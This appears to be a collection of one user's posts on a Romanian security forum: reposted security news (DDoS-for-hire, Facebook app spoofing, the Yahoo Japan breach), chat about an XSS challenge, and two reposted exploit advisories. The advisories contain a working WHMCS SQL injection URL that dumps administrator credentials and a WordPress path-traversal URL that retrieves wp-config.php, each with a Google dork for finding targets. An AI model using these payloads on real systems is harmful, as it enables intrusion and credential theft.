akkiliON

A website that can be described as "DDoS for hire" is perfectly legitimate, according to the owner. Malicious sites that offer attack services are not strangers on the Internet, but web sites sponsored by law enforcement is another story altogether. Ragebooter, is one of many sites that accepts payment through Paypal in order to flood sites with junk traffic, overloading servers and denying others access. The service uses a technique called DNS Reflection to flood a website and amplify the amount of traffic directed at an address. Investigation shows the site operator is a guy named Justin Folland located in Memphis Tennessee. "Since it is a public service on a public connection to other public servers this is not illegal. Nor is spoofing the sender address. If the root user of the server does not want that used they can simply disable recursive DNS. My service is a legal testing service. How individuals use it is at their own risk and responsibilities. I do not advertise this service anywhere nor do I entice or encourage illegal usage of the product. How the user uses it is at their own risk. I provide logs to any legal law enforcement and keep logs for up to 7 days." He claimed that his service was not used to attack people, but only for legitimate stress-testing, then he changed his story and said he was only managing the service for someone else. It is not clear if it is a guy who works with the FBI, but what is certain is that the service is alive and kicking. An FBI spokesman would neither confirm nor deny the claim. FBI sponsored Ragebooter DDoS attack service - TheHackerNews

Exact )

There are many unpatched loopholes or flaws in Facebook website, that allow hackers to inject external links or images to a wall, hijacking any facebook account or bypassing your social privacy. Today we are going to report about another unfixed facebook app vulnerability that allow a hacker to spoof the content of any Facebook app easily. Nir Goldshlager from Break Security today exposed another major flaw that allows hacker to wall post spoofed messages from trusted applications like Saavn, Candy Crush, Spotify, Pinterest, or really any other application on Facebook. In 2012 Facebook's method of publishing called stream.publish and the Stream Publish Dialog looks like the following: Where app_id and attachment (swfsr,imgsrc,href) parameters can be targeted by hackers i.e using app_id value as application ID of any application you want to spoof (Saavn, Spotify, etc.) and an attacker must produce attachment parameters like swfrsc and imgsrc. If the Stream post URL security option is disabled by the developer of that application, hacker can use any remotely uploaded swf file as attachment parameter. "every time a victim visits my wall post, they will see content spoofing from a Facebook application that they generally trust. Clicking the link on the post makes an swf file from the external website execute on his client machine." Nir said. But in 2013, Facebook changed the mechanism of stream.publish posting and introduced new parameters as explained below: 1. Link parameter: With this parameter, we will include our malicious external link (virus exe file, 0days, Phishing site, or any other malicious link. 2. Picture Parameter: This parameter is only usable if we want to spoof the content with an image. The content of the image will only display correctly on our Wall post. It will not display correctly in the newsfeed, making it relevant only to wall post app spoofing. 3.Caption Parameter: This parameter will allow to an attacker choose from which website the content came from, For Example: Facebook.com Zynga.com Ownerappdomain.com 4. Name Parameter: This parameter produces the title we desire. Whenever the victim clicks on that title, he will be taken to our malicious website. Few examples as given below: Diamond Dash: SoundCloud: Skype: Slidshare Spoofing the parameters again allowing one to spoof the content of any Facebook app and flaw is still unpatched. This techniques can be widely used by cyber crooks to social engineer facebook users or to install malwares on their systems. Sursa: Facebook Hacking, technique to Spoof the content of any Facebook App - TheHackerNews

22 million Yahoo! Japan's user IDs may have been stolen during an unauthorised attempt to access the administrative system of its Japan portal. "We don’t know if the file of 22 million user IDs was leaked or not, but we can't deny the possibility given the volume of traffic between our server and external terminals" Yahoo said. The information did not include passwords and the kind of data necessary to verify a user’s identity or reset passwords, it said, adding that the company had updated its security measures to prevent a repeat of the incident. In 2011, Sony said information such as usernames, passwords and birth dates of more than 100 million people may have been compromised after hackers struck the PlayStation Network and Sony Online Entertainment services. Japan acknowledges that its preventative measures against cyberattacks remain underdeveloped, with the national police agency having announced this month it would launch a team to analyze and combat cyberattacks. Japan Aerospace Exploration Agency said last month that information related to the International Space Station may have been leaked during an unauthorized attempt to access its system. 22 million Yahoo IDs stolen from their Japanese Server - The Hacker News

TrendMicro-HouseCall TROJ_GEN.F47V0318 20130415 VBA32 Worm.Shakblades Jiangmin Backdoor/MSIL.acp

Vector 0,5 day :> ?

Ok ! Multumesc ca mi-ai raspuns la intrebari ! Sa ii bei sanatos

Dar celalalt ? Care puteai sa inchizi parca orice cont sau ceva de genu daca nu ma insel ... Nici la celalalt nu ti-or raspuns ? Mersi !

Deci ai mai primit ceva mesaj de la ei ?

Congrats ! Asa mai zic si eu Show off

Multumesc ! Ai facut o treaba "buna" ! De ce nu lasi si pe altii sa rezolve acest challenge ? Am vrut sa vad cati de aici rezolva acest challenge ! Am facut mai mult acest challenge cu scopul de a atrage cati mai multi concurenti care sunt incepatori in acest domeniu ! Iar rezolvarea o puneam pana cand primii 10 rezolvau acest challenge ! Poate asa invatau si ei ceva ! Daca tot ai rezolvat puteai frumos sa imi dai un P.M cu rezolvarea ! Sper ca pe viitor sa numai faci prostia asta ! Multumesc ON: Felicitari tuturor care au participat ! Se pare ca premiul va fi acordat lui cemama ! danyweb09 si gafi se pare ca nu au dorit acest premiu ! // cemama ai P.M !

Felicitari Sega ! Se pare ca nici Sega nu doreste contul de steam ! Inca il mai am ! Urmatorul care va rezolva va avea contul de steam daca il doreste !

Primul a fost TheTime si a castigat un cont de steam ! Felicitari ! Am sa mai fac challenge-uri cu alte premii in curand ! // EDIT: Se pare ca numai doreste contul de steam ... dar are un loc in lista cu solvers ! Urmatorul care rezolva e al lui contul ! Bafta

M-am gandit sa fac un mic challenge si sa ofer un premiu ! ( Nu am ceva mai bun sa va dau ) # Target: Swingnote # Vulnerabilitate: XSS Reflected # Proof: http://img694.imageshack.us/img694/132/challengexss.jpg # Camp vulnerabil: String Reguli: Primul care imi trimite rezolvarea, prin P.M, va castiga un cont de steam cu urmatoarele jocuri: - Counter-Strike - Counter-Strike: Condition Zero - Counter-Strike: Condition Zero Deleted Scenes Poate va intrebati de ce am cenzurat atat ! Daca rezolvati acest challenge o sa va vedeti de ce Daca un moderator doreste o dovada, ca acest site este vulnerabil, P.M si am sa va raspund ! Cand trimiteti rezolvarea vreau sa vad si ce vector ati folosit ! Succes ! // Am uitat ceva ! Fac si o lista cu cei care au rezolvat acest challenge, care nu au primit nici un premiu ! Solvers - TheTime - Sega - danyweb09 - gafi - cemama - Hertz - - - - Closed !

Eu as da BAN pentru astfel de prostii !

# Title: WHMCS 4.x SQL Injection Vulnerability # Google Dork: intext:"Powered by WHMCompleteSolution" OR inurl:"submitticket.php?"? # Author: Ahmed Aboul-Ela # Contact: Ahmed.Aboul3la[at]gmail[dot]com # Date: 14/5/2013 # Vendor: http://www.whmcs.com # Version: 4.5.2 and perior versions should be affected too # Tested on: Linux ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sql Injection Vulnerability in "/includes/invoicefunctions.php" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - Vulnerable Code Snippet : LINE 582: function pdfInvoice($id) LINE 583: { LINE 686: if ($CONFIG['GroupSimilarLineItems']) LINE 687: { LINE 688: $result = full_query('' . 'SELECT COUNT(*),id,type,relid,description,amount,taxed FROM tblinvoiceitems WHERE invoiceid=' . $id . ' GROUP BY `description`,`amount` ORDER BY id ASC'); LINE 689: } As we can see here the $id argument of pdfInvoice function have been used directly at mysql query without any sanitization which leads directly to Sql Injection It appears that pdfInvoice function is being called at "/dl.php" file as the following: LINE 21: if ($type == 'i') LINE 22: { LINE 23: $result = select_query('tblinvoices', '', array( LINE 24: 'id' => $id LINE 25: )); LINE 26: $data = mysql_fetch_array($result); LINE 27: $invoiceid = $data['id']; LINE 28: $invoicenum = $data['invoicenum']; LINE 29: $userid = $data['userid']; LINE 30: if ((!$_SESSION['adminid'] && $_SESSION['uid'] != $userid)) LINE 31: { LINE 32: downloadLogin(); LINE 33: } LINE 34: if (!$invoicenum) LINE 35: { LINE 36: $invoicenum = $invoiceid; LINE 37: } LINE 38: require('includes/clientfunctions.php'); LINE 39: require('includes/countries.php'); LINE 40: require('includes/invoicefunctions.php'); LINE 41: require('includes/tcpdf.php'); LINE 42: $pdfdata = pdfInvoice($id); LINE 43: header('Pragma: public'); LINE 44: header('Expires: Mon, 26 Jul 1997 05:00:00 GMT'); LINE 45: header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT'); LINE 46: header('Cache-Control: must-revalidate, post-check=0, pre-check=0, private'); LINE 47: header('Cache-Control: private', false); LINE 48: header('Content-Type: application/octet-stream'); LINE 49: header('Content-Disposition: attachment; filename="' . $invoicenum . '.pdf"'); LINE 50: header('Content-Transfer-Encoding: binary'); LINE 51: echo $pdfdata; LINE 52: exit(); LINE 53: return 1; LINE 54: } As we can see at LINE "42" the pdfInvoice function have been called and passed $id Variable without any sanitization Afterwards it force the browser to download the generated invoice in PDF format - Proof of Concept for Exploitation To Dump Administrator Credentials (user & pass): http://www.site.com/whmcs/dl.php?type=i&id=1 and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins -- ~ Result: The Browser will prompt download for the pdf invoice file after opening it you should find the username and pw hash there - Precondition to Successfully Exploit the Vulnerability: "Group Similar Line Items" Option should be Enabled at the Invoices Settings in the WHMCS Admin ( It should be Enabled by default ) - Credits: Ahmed Aboul-Ela - Information Security Consultant @ Starware Group WHMCS 4.x (invoicefunctions.php, id param) - SQL Injection Vulnerability

Title: Wordpress wp-FileManager Local File Download Vulnerability Author: ByEge Download: http://wordpress.org/extend/plugins/wp-filemanager/ Test Platform: Linux Images: http://j1305.hizliresim.com/19/f/n0xxf.jpg Vuln. Plat.: Web Application Google Dorks: inurl:wp-content/plugins/wp-filemanager/ Test : http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download # Exploit-DB Note: # In order for this to work, the "Allow Download" setting must be checked in the FileManager's settings. Wordpress wp-FileManager - Arbitrary File Download Vulnerability

Eu as interzice prostiile astea de site-uri pe forum !

BeEF - The browser exploitation framework project Useful !

La multi ani !